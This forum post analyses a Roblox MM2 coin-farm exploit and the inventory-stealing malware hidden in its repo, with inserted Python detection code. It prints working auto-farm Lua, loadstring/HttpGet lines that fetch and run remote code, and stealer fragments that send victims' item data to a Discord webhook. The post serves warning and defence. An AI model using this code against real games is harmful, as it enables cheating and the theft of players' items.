Introduction.
Hello there. Recently, I have been wondering how exploits work, and how Roblox doesn't detect them, because I see so many exploiters literally ruining each and every game I join. And for educational purposes, to just see what's under the hood, y'know?
But what I discovered is much more sinister and evil than just normal exploiting, which you’ll just have to see.
Warning: I suggest you do not attempt anything in this post; it might lead to a ban, or hate, or whatever more. I also highly discourage you from clicking or entering any of these links, as they might steal your data and are probably malicious.
Anyway, enough with the introduction, and let's jump in.
The fun part.
Now, I wanted to focus more on game-specific exploits, as they are probably a little easier to take apart, so let's pick a game… how about MM2? Sounds like a decent pick: coin farms, aimbot, ESP? All the juicy goodness, but we are only going to go through one of the exploits in this post, the coin farming, as I see it's quite interesting.
Now, I found a showcase YouTube video talking about a coin/egg farm in MM2; the video was made by a channel named "Tool Scripts".
Let’s take a look at the video:
(let me know if this doesn’t work)
I'm only going to include links that are safe to go on, pages like GitHub and Pastebin. Links that are not GitHub or anything similar I highly recommend you do not go on, unless you know what you are doing.
(DO NOT RUN ANY OF THESE SCRIPTS!!! I'M NOT RESPONSIBLE FOR YOUR ACCOUNT!!!)
I went down to the description and found a link, which I'm guessing leads you to the loadstring to put into your executor. Now it told me to do some tasks, I "did" them, by of course clicking until it let me in, and I got led to a raw Pastebin page, containing this:

```lua
loadstring(game:HttpGet('https://raw.githubusercontent[dot]com/zdkjaime/MM2/refs/heads/main/MM2HUB'))()
```
Now this link looks like it grabs code from some kind of file on GitHub and runs it with loadstring, seems simple enough.
Now, we can get the actual GitHub repo, and the file, by just changing some things in the URL.
5 minutes later, and some magic, it leads us to this Github page:
Now we can see what it's running; looks like it's running some obfuscated code, which is a ton of gibberish. So we won't really be able to understand what's going on.
But, if you look, there's a tiny little detail, do you know what it is? Just so you know, it's not related to the code.
If you said, there’s more files in the Github repo, you would be correct!
Now I looked through the files, and tried to deobfuscate one of the files called “AutoFarmV2”, but it seems very difficult and time consuming, maybe if this gets more attention, I might look more into it.
Now, crazy thing… THEY ARE STILL UPDATING THE REPO!!
At the time of writing this, they have added 2 new files, an hour ago, with one of them not being obfuscated, yippee!
Though the code is absolute sludge, and is just flying and fling scripts, here is one of them:
It might not work by the time you're reading this, and might be obfuscated, sorry.
But what I will do is provide a code snippet of how the coin farm works; this is provided inside the new script:
(DO NOT USE THIS CODE, YOU WILL GET BANNED, YOU HAVE BEEN WARNED!!)
Auto-farm Coins
```lua
-- Function to get the nearest coin
function AutoFarm:getNearestCoin()
    local closest_coin, min_distance = nil, math.huge
    for _, model in pairs(workspace:GetChildren()) do
        if model:FindFirstChild("CoinContainer") then
            for _, coin in pairs(model.CoinContainer:GetChildren()) do
                if coin:GetAttribute("CoinID") == self.ToFarm and coin:FindFirstChild("TouchInterest") then
                    local distance = (self.HumanoidRootPart.Position - coin.Position).Magnitude
                    if distance < min_distance then
                        closest_coin = coin
                        min_distance = distance
                    end
                end
            end
        end
    end
    return closest_coin, min_distance
end

-- Function to tween to the target (with speed control)
function AutoFarm:tweenTo(position, baseSpeed)
    local adjustedSpeed = baseSpeed * (30 / self.speed) -- Inverse adjustment (higher number = slower)
    local tween = game:GetService("TweenService"):Create(
        self.HumanoidRootPart,
        TweenInfo.new(adjustedSpeed, Enum.EasingStyle.Linear),
        {CFrame = position}
    )
    tween:Play()
    return tween
end

-- Main autofarm loop
function AutoFarm:startFarmingLoop()
    spawn(function()
        while self.Enabled do
            if not self.bag_full and self.Character and self.HumanoidRootPart then
                local coin, distance = self:getNearestCoin()
                if coin then
                    if distance > 150 then
                        self.HumanoidRootPart.CFrame = coin.CFrame
                    else
                        local tween = self:tweenTo(coin.CFrame, distance / 24) -- Base speed 50
                        repeat task.wait() until not coin:FindFirstChild("TouchInterest") or not self.Enabled
                        tween:Cancel()
                    end
                end
            end
            task.wait(0.1)
        end
    end)
end
```
Seems simple, right? All it does is check which coin is closest to the player, tween the player's CFrame to that coin, and the process repeats itself.
I wonder why @Nikilis still hasn’t added a measure against this, seems easy to patch.
(Please do)
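The check the post asks the developer for, sketched as an added example (my code, not the post's, not anything from MM2 or Roblox): a server-side movement plausibility check, simulated in Python over constructed position samples rather than written as a Luau server script. The only fact taken from Roblox is the default `Humanoid.WalkSpeed` of 16 studs per second; the tolerance, strike threshold, sample rate and all names are assumptions. `exploit_tween_speed()` simply evaluates the tween-duration formula from the snippet above; the arithmetic shows the farm's effective speed is 0.8 × its `speed` setting regardless of distance, so a tween at `speed = 20` moves at walking pace and slips past a pure speed check, which is the caveat for anyone implementing this.

```python
"""Server-side movement plausibility check, simulated offline.

Added example, not code from the post, MM2 or Roblox. The auto-farm above
moves the character either by a hard CFrame teleport (coin more than 150
studs away) or by a linear tween whose duration is
distance / 24 * (30 / speed) seconds. A server can sample each player's
HumanoidRootPart position every heartbeat and count moves that exceed
WalkSpeed * dt plus a tolerance. Names, tolerance and thresholds are
assumptions for the example; 16 is Roblox's default Humanoid.WalkSpeed.
"""
import math
from dataclasses import dataclass

DEFAULT_WALKSPEED = 16.0   # studs per second, Roblox default Humanoid.WalkSpeed
TOLERANCE = 1.5            # assumed slack for latency, jumping, physics jitter
STRIKES_TO_FLAG = 3        # assumed: consecutive over-budget moves before flagging


@dataclass
class PlayerState:
    pos: tuple             # last accepted (x, y, z) position in studs
    walkspeed: float = DEFAULT_WALKSPEED
    strikes: int = 0       # consecutive over-budget moves


def check_move(state, new_pos, dt):
    """Record a new position; return False if it exceeds the speed budget for dt seconds."""
    allowed = state.walkspeed * dt * TOLERANCE
    moved = math.dist(state.pos, new_pos)
    state.pos = new_pos
    if moved > allowed:
        state.strikes += 1
        return False
    state.strikes = 0      # budget respected: reset the consecutive counter
    return True


def replay(samples, walkspeed=DEFAULT_WALKSPEED):
    """Feed (position, dt) samples through check_move; return (flagged, worst consecutive strikes)."""
    state = PlayerState(pos=samples[0][0], walkspeed=walkspeed)
    worst = 0
    for pos, dt in samples[1:]:
        check_move(state, pos, dt)
        worst = max(worst, state.strikes)
    return worst >= STRIKES_TO_FLAG, worst


def exploit_tween_speed(distance_studs, speed_setting):
    """Effective studs/second of the snippet's tweenTo(): distance / (distance/24 * 30/speed)."""
    duration = (distance_studs / 24) * (30 / speed_setting)
    return distance_studs / duration


# --- constructed samples (not captured from a real server) -------------------
def walk_samples(studs_per_second, ticks, dt=0.1):
    """A character moving along +X at a constant rate, sampled every dt seconds."""
    return [((studs_per_second * dt * i, 0.0, 0.0), dt) for i in range(ticks + 1)]

LEGIT_WALK = walk_samples(14.0, 10)                                # a little under WalkSpeed
TELEPORT_LOOP = [((0.0, 0.0, 0.0), 0.1), ((200.0, 0.0, 0.0), 0.1),
                 ((200.0, 0.0, 200.0), 0.1), ((0.0, 0.0, 200.0), 0.1)]  # far coins: 3 CFrame jumps
TWEEN_SPEED_50 = walk_samples(exploit_tween_speed(100.0, 50), 5)   # 40 studs/s
TWEEN_SPEED_20 = walk_samples(exploit_tween_speed(100.0, 20), 5)   # 16 studs/s: walking pace

if __name__ == "__main__":
    for name, s in [("legit walk", LEGIT_WALK), ("teleport loop", TELEPORT_LOOP),
                    ("tween speed=50", TWEEN_SPEED_50), ("tween speed=20", TWEEN_SPEED_20)]:
        flagged, worst = replay(s)
        print(f"{name:15s} flagged={flagged} worst_strikes={worst}")
```

The teleport branch and the default tween are caught within three ticks, while the `speed = 20` tween is not, so a speed budget alone only raises the farm's cost; the server would also want to validate that the path between samples is walkable and rate-limit coin pickups.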
Now this is where the normal part ends, as now we get to the evil part, which makes this 10x worse.
The evil part...
Now, I found some other scripts inside this repo, and we are going to look at 2 of these, which I find disgusting and terrible.
Joiner.lua
Let’s first look at a file called Joiner.lua:
Now at first glance, it doesn't look that bad, it looks like some kind of trading script, right until you look into the variable and function names (snippets from the actual GitHub repo and file):

```lua
local victimUser = readfile("user.txt")
```
huh… interesting… here’s another one:
```lua
local didVictimLeave = false
```
wow, victim? Why would the developers of this malware call variables “victim”? Another:
```lua
local function autoJoin()
    local response = request({
        Url = "https://discord.com/api/v9/channels/"..channelId.."/messages?limit=10",
        Method = "GET",
        Headers = {
            ['Authorization'] = token,
            ['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36',
            ["Content-Type"] = "application/json"
        }
```
HUHHHH?!?!?!?! AN API CALL TO DISCORD?!?! WHY WOULD AN EXPLOIT CALL A DISCORD API!?!?!? AND WHY IS THE FUNCTION CALLED “AUTOJOIN”?!?!?!
Well, now this is crazy, this script literally requests some kind of data from Discord. Probably for some kind of… bot?? To join and…, and!?!
Well, actually, this function only retrieves some kind of information from Discord. I'm guessing usernames or skins of that player. Joins that player, saves the player's userId, and writes their username to some .txt file, which they might use later to steal skins.
This is only a theory, as I don't have the Discord information, and I'm not sure what the .txt files contain.
But there is definitely, DEFINITELY, no reason why variable names would be called “didVictimLeave”, seems kind of suspicious, right?
Here is another snippet of code from the same file:
```lua
loadstring(game:HttpGet('https://dpaste[dot]com/533UT4V7A.txt'))()
```
Might be different at the time you're reading this. Sorry, try this, or read a little more, you'll understand: https://dpaste[dot]com/EAEJ9K84K.txt
Now, it does the same thing as injecting a script, but it doesn't load from GitHub, and is included inside of the script, so it runs when Joiner.lua is run.
It loads code from some other site called… dpaste??
Now, let's look through the actual link, at what it's actually running; I'm only going to include some snippets though.
(DO NOT RUN ANY OF THESE SCRIPTS, YOU WILL GET BANNED, YOU HAVE BEEN WARNED!!)
```lua
_G.Usernames = {"FAZE_SHADWO","CupidAltAccount1","CupidAltAccount55"}
_G.min_rarity = "Godly"
_G.min_value = 1
_G.pingEveryone = "Yes"
_G.whook = "https://discord.com/api/webhooks/REDACTED-FOR-FORUM"
```
Well x3, what do we have here?
min_rarity? definitely nothing malicious!
Usernames? oh yeah, why would they be there? the script is absolutely safe, right!?
```lua
local function addWeaponToTrade(id)
    local args = {
        [1] = id,
        [2] = "Weapons"
    }
    game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))
end
```
oh, yeah, why would there be a function to add weapons to a trade, I wonder, hmm?
Definitely A-okay!
```lua
local function SendFirstMessage(list, prefix)
    local headers = {
        ["Content-Type"] = "application/json"
    }
    local fields = {
        {
            name = "Victim Username:",
            value = plr.Name,
            inline = true
        },
        {
            name = "Join here:",
            value = "https://fern.wtf/joiner?placeId=142823291&gameInstanceId=" .. game.JobId
        },
        {
            name = "Item List:",
            value = "",
            inline = false
        },
        {
            name = "Summary:",
            value = string.format("Total Value: %s", totalValue),
            inline = false
        }
    }
```
Oh, name = "Victim Username: ", "Join Here: "?
Absolutely, not malicious, at ALL!!
```lua
local function SendMessage(sortedItems)
    local headers = {
        ["Content-Type"] = "application/json"
    }
    local fields = {
        {
            name = "Victim Username:",
            value = plr.Name,
            inline = true
        },
        {
            name = "Value sent:",
            value = "",
            inline = false
        },
        {
            name = "Total Value beamed:",
            value = string.format("Total Terabytes: %s", totalValue),
            inline = false
        }
    }
```
"Value sent: "? Oh yeah, definitely, not an issue. "Total Value beamed: "? Yep nothing going on here, pal.
```lua
if #weaponsToSend > 0 then
```
oh yeah, weapons to send? nothing suspicious here.
But enough with the jokes, this is actually concerning.
This script gets the player's inventory info in MM2, sends it to some random dude on Discord, who can then join and BEAM!! All their skins, items, etc. Right off the victim's own inventory.
Crazy, right??
And then, an additional spit in the face:
```lua
plr:kick("Your version of Roblox may be out of date. Please update Roblox and try again later, if u using an alternate account probably need to log into main account.")
```
It kicks the player, with a fake message that Roblox is not updated, once all the items have been stolen; the funny thing is, they couldn't even type it out formally.
Well, now, let's move on to the second file, this one's called "Real Script".
Real Script
Now this one is going to be quite short, as it mainly includes the things that Joiner.lua has.
But has some additional information, and things in general.
Now let's go to the actual file inside the repo:
This file has only one line, which looks similar to the one that Joiner.lua has; we are not going to look through it, as the file is literally the same as in Joiner.lua, just with a different URL endpoint (e.g. ABCDE1234).
But the interesting thing is that if you look through the version history, this file was literally one of the obfuscated scripts that we looked at in the previous part, but now it's a malware script which steals all your items.
File version 2 weeks ago:
File version 12 hours ago (at the time of writing this):
People not knowing this might just use the script they always used, and BAM, all their items are stolen in a flash. I kind of feel bad for the exploiters that do not know this, and get their items stolen.
This is truly disgusting by the developer of this exploit, and I find this worse than normal exploiting.
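Before running anything that arrives through a loader chain like the ones above, a practitioner would at least triage the script statically. The following is an added example (my code, not from the post, the repository it examines, or any executor): a Python scanner that looks for the strings this post found separate an inventory stealer from a plain coin farm, pulls out the `loadstring(game:HttpGet(...))` URLs, maps a raw.githubusercontent.com URL to the repository page the way the post did "by changing some things in the URL", and defangs URLs for reporting in the post's `[dot]` style. The weights and thresholds are assumptions for ranking, not a standard; the sample scripts are constructed from fragments quoted in the post, with every URL replaced by a placeholder.

```python
"""Static triage of a Roblox executor script for the indicators this post found.

Added example; not code from the post, the repository it examines, or any
executor. It does not run anything: it reports strings that, in the post's
findings, separated a plain coin farm from an inventory stealer (remote
loadstring loaders, Discord webhooks and API calls with an Authorization
header, local file access, trade remotes fired by the script, "victim"
wording, the fake "out of date" kick, a join link carrying the server JobId).
Weights and thresholds are assumptions for ranking, not a standard.
"""
import re

INDICATORS = [  # (name, pattern, weight)
    ("remote_loader",   r"loadstring\s*\(\s*game:HttpGet\s*\(",                        1),
    ("paste_host",      r"https?://(?:raw\.githubusercontent|pastebin|dpaste)\.com/", 1),
    ("discord_webhook", r"discord(?:app)?\.com/api/webhooks/",                         4),
    ("discord_api",     r"discord\.com/api/v\d+/",                                     3),
    ("auth_header",     r"\[\s*['\"]Authorization['\"]\s*\]",                          2),
    ("local_file",      r"\b(?:readfile|writefile|appendfile|isfile)\s*\(",            2),
    ("victim_wording",  r"victim|beamed|beamer",                                       2),
    ("trade_remote",    r"WaitForChild\(\s*['\"]Trade['\"]\s*\).*?FireServer",         3),
    ("fake_kick",       r":kick\s*\(\s*['\"][^'\"]*out of date",                        3),
    ("join_link",       r"gameInstanceId=",                                            2),
]
COMPILED = [(name, re.compile(rx, re.I), w) for name, rx, w in INDICATORS]
LOADER_URL = re.compile(r"loadstring\s*\(\s*game:HttpGet\s*\(\s*['\"]([^'\"]+)['\"]", re.I)


def scan(source):
    """Return {indicator: match count} for each indicator present in the source."""
    found = {}
    for name, rx, _ in COMPILED:
        n = len(rx.findall(source))
        if n:
            found[name] = n
    return found


def verdict(source):
    """Return ('high' | 'low' | 'none', score, findings); score sums the weight of each indicator present."""
    found = scan(source)
    s = sum(w for name, _, w in COMPILED if name in found)
    if s >= 8:
        level = "high"   # several stealer indicators together
    elif s >= 1:
        level = "low"    # at minimum fetches remote code you cannot audit
    else:
        level = "none"
    return level, s, found


def loader_urls(source):
    """URLs the script fetches and executes via loadstring(game:HttpGet(...))."""
    return LOADER_URL.findall(source)


def github_page(raw_url):
    """Map a raw.githubusercontent.com URL (/owner/repo/<ref>/path, where <ref> may be a bare
    branch or refs/heads/branch) to the repository's blob page; None for other hosts."""
    m = re.match(r"https://raw\.githubusercontent\.com/([^/]+)/([^/]+)/(?:refs/heads/)?([^/]+)/(.+)$", raw_url)
    if not m:
        return None
    owner, repo, branch, path = m.groups()
    return f"https://github.com/{owner}/{repo}/blob/{branch}/{path}"


def defang(url):
    """Write a URL the way the post does (dpaste[dot]com) so it cannot be clicked by accident."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme}://{host.replace('.', '[dot]')}{slash}{path}"


# --- constructed samples, assembled from fragments quoted in the post; URLs are placeholders ---
SAMPLE_STEALER = r'''
local victimUser = readfile("user.txt")
local didVictimLeave = false
local function autoJoin()
    local response = request({
        Url = "https://discord.com/api/v9/channels/"..channelId.."/messages?limit=10",
        Method = "GET",
        Headers = { ['Authorization'] = token }
    })
end
_G.whook = "https://discord.com/api/webhooks/PLACEHOLDER-NOT-A-REAL-WEBHOOK"
local joinLink = "https://example.invalid/joiner?gameInstanceId=" .. game.JobId
game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))
plr:kick("Your version of Roblox may be out of date. Please update Roblox and try again later.")
loadstring(game:HttpGet('https://dpaste.com/PLACEHOLDER.txt'))()
'''
SAMPLE_FARM = r'''
local closest_coin, min_distance = nil, math.huge
for _, model in pairs(workspace:GetChildren()) do
    if model:FindFirstChild("CoinContainer") then
        -- pick the nearest coin and tween the HumanoidRootPart to it
    end
end
'''
SAMPLE_LOADER = "loadstring(game:HttpGet('https://raw.githubusercontent.com/OWNER/REPO/refs/heads/main/FILE'))()"

if __name__ == "__main__":
    for name, src in [("stealer", SAMPLE_STEALER), ("coin farm", SAMPLE_FARM), ("loader", SAMPLE_LOADER)]:
        level, s, found = verdict(src)
        print(f"{name:10s} {level:5s} score={s:2d} {found}")
        for url in loader_urls(src):
            page = github_page(url)
            print("   fetches:", defang(url), "->", defang(page) if page else "not a GitHub raw URL")
```

This is a string scanner, so it is only as good as its patterns: the obfuscated files in the repo would score at most "low" even if they carry the same payload, which is exactly the post's point that you cannot audit code you cannot read. A bare loader scoring "low" is not a clean bill; it means the decision has been deferred to whatever that URL serves at run time, and, as the version history in the section above shows, that can change from a coin farm to a stealer between two runs.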
Verdict.
Never run something when you don't know what it's doing, or if it's not from a trusted developer. Honestly, I just came in here to see how these scripts work and what they do; never would have thought to come across such a goldmine just by looking through some exploits.
The final message? Don't exploit, ever; you don't know what you're getting into, and you'll probably fall for a trap like this. So just don't, please.
Anyway, that's basically it, let's get this GitHub repo removed, these accounts banned, and YouTube banned.
I'm not sure if I went too far with all the code or the information; if I did, I am truly sorry, forgive me please.
@FAZE_SHADWO @CupidAltAccount1 @CupidAltAccount55
@Nikilis Please implement measures, thank you!!
tl;dr:
This exploit is malicious, will steal your MM2 items.
Do NOT exploit, ever, you will fall into something like this, or get banned.
Add anti-exploit measures.
Anyway, that’s it, have a blessed day/night, and thank you for reading this long-ass post.
Philippians 4:13
“I can do all things through him who strengthens me.”
Thank you!
Edit: I never thought I would get some attention, thank you very much! They are still updating the repo and changing the code, so the things you might see are different to the ones I might see, so I'm sorry for that. Here's another link to that suspicious inventory stealer, as I'm pretty sure they have updated it; you can also check the link on "Main Script" as it's exactly the same example:
https://dpaste[dot]com/EAEJ9K84K.txt

